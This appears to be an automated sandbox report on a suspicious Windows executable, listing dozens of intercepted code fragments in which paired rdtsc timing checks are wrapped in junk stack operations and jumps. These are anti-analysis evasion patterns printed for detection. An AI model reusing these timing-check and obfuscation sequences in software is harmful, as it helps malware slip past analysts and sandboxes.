Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 173B057 second address: 173B060 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 173B060 second address: 173B064 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1740198 second address: 17401B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 pushad 0x00000007 jmp 00007FEEDCB1F6E6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 16C60B2 second address: 16C60E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FEEDCB2F2E6h 0x0000000a popad 0x0000000b jp 00007FEEDCB2F2F2h 0x00000011 jno 00007FEEDCB2F2EEh 0x00000017 push eax 0x00000018 push edx 0x00000019 jbe 00007FEEDCB2F2E6h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 16C60E7 second address: 16C60EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 173EEE2 second address: 173EF03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007FEEDCB2F2F6h 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FEEDCB2F2EEh 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 173EF03 second address: 173EF07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1772839 second address: 177283D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 177283D second address: 1772841 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1772841 second address: 1772847 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1772847 second address: 1772858 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FEEDCB1F6DCh 0x00000008 jbe 00007FEEDCB1F6D6h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1772E3F second address: 1772E57 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB2F2F4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1772E57 second address: 1772E5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17730FB second address: 1773103 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1773103 second address: 1773130 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FEEDCB1F6E9h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 pushad 0x00000015 popad 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 pop eax 0x00000019 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1773130 second address: 1773135 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1773426 second address: 1773446 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jne 00007FEEDCB1F6D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jns 00007FEEDCB1F6D6h 0x00000015 pushad 0x00000016 popad 0x00000017 push edi 0x00000018 pop edi 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e push edx 0x0000001f pop edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1773446 second address: 1773461 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FEEDCB2F2E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 popad 0x00000011 jbe 00007FEEDCB2F2F4h 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1773746 second address: 177374D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 177374D second address: 1773766 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEEDCB2F2EEh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17739EF second address: 17739F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FEEDCB1F6D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17739F9 second address: 1773A03 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1773A03 second address: 1773A09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17794E8 second address: 17794F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FEEDCB2F2E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 177C4CD second address: 177C4F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB1F6E0h 0x00000007 jmp 00007FEEDCB1F6DAh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jo 00007FEEDCB1F6DCh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 177C4F3 second address: 177C50F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jng 00007FEEDCB2F2E6h 0x0000000c jmp 00007FEEDCB2F2F0h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 177CAC0 second address: 177CAC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 177CE9D second address: 177CEA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 177CEA1 second address: 177CEA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 177CEA7 second address: 177CEB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007FEEDCB2F2E6h 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1784310 second address: 1784314 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1784314 second address: 178432F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB2F2F6h 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17845DD second address: 17845FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FEEDCB1F6E8h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1784738 second address: 1784759 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 popad 0x00000011 jmp 00007FEEDCB2F2EDh 0x00000016 push ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1784759 second address: 178475F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17848A2 second address: 17848C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB2F2ECh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ecx 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jl 00007FEEDCB2F2F2h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17848C3 second address: 17848E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FEEDCB1F6D6h 0x0000000a jmp 00007FEEDCB1F6E5h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17848E2 second address: 17848EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17848EA second address: 17848F4 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FEEDCB1F6D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1784A43 second address: 1784A4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1785127 second address: 178512D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 178580F second address: 1785813 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1785813 second address: 1785827 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FEEDCB1F6D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007FEEDCB1F6D6h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 178D0D5 second address: 178D0E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEEDCB2F2EEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 178D0E7 second address: 178D0ED instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 178D0ED second address: 178D0FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEEDCB2F2ECh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 178D3D8 second address: 178D3E2 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FEEDCB1F6D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 178D3E2 second address: 178D3E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 178D3E8 second address: 178D404 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEEDCB1F6E8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 179950D second address: 1799511 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1799511 second address: 179952F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FEEDCB1F6E8h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 179952F second address: 1799536 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1799536 second address: 179953E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 179BC7F second address: 179BC8A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17AB4A8 second address: 17AB4AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17AB4AC second address: 17AB4FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007FEEDCB2F2F9h 0x0000000a jmp 00007FEEDCB2F2ECh 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 jmp 00007FEEDCB2F2EDh 0x00000018 jmp 00007FEEDCB2F2F4h 0x0000001d push ecx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17B2CF3 second address: 17B2CF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17B2CF7 second address: 17B2CFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17B2CFD second address: 17B2D08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17B2D08 second address: 17B2D23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEEDCB2F2F5h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17BB201 second address: 17BB205 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17BB205 second address: 17BB21B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB2F2ECh 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17BB21B second address: 17BB233 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEEDCB1F6E4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17BB233 second address: 17BB237 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17BB7D2 second address: 17BB7F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007FEEDCB1F6D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FEEDCB1F6DFh 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17BB7F1 second address: 17BB817 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB2F2ECh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FEEDCB2F2F1h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17BB817 second address: 17BB853 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FEEDCB1F6E0h 0x00000008 pushad 0x00000009 jmp 00007FEEDCB1F6E0h 0x0000000e jmp 00007FEEDCB1F6E5h 0x00000013 push eax 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17BB9C3 second address: 17BB9D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jnc 00007FEEDCB2F2E6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17BB9D8 second address: 17BB9DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17BB9DC second address: 17BB9E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17BBB04 second address: 17BBB37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEEDCB1F6E6h 0x00000009 popad 0x0000000a jmp 00007FEEDCB1F6E8h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17C0E0C second address: 17C0E12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17C0B70 second address: 17C0B9B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB1F6E6h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FEEDCB1F6E1h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17FF088 second address: 17FF08E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17FF08E second address: 17FF094 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 18007A1 second address: 18007B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 ja 00007FEEDCB2F2ECh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 18007B2 second address: 18007BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007FEEDCB1F6D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 18007BD second address: 18007EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEEDCB2F2F6h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FEEDCB2F2EFh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 16C60D7 second address: 16C60E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007FEEDCB1F6D6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 18088C9 second address: 18088EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop ecx 0x00000008 pushad 0x00000009 push eax 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FEEDCB2F2F5h 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 18088EE second address: 1808904 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FEEDCB1F6DDh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1808904 second address: 180890A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1819E93 second address: 1819E99 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 18E90D9 second address: 18E90EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB2F2ECh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 18E8059 second address: 18E808A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jmp 00007FEEDCB1F6E6h 0x0000000d pop esi 0x0000000e popad 0x0000000f pushad 0x00000010 jne 00007FEEDCB1F6DCh 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 18E808A second address: 18E8090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 18E8090 second address: 18E8094 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 18E81E1 second address: 18E81ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 je 00007FEEDCB2F2E6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 18E89D1 second address: 18E89D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 18ED33A second address: 18ED355 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB2F2F7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 18ED355 second address: 18ED35A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 70100A9 second address: 70100BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 1E0AA822h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub esp, 18h 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
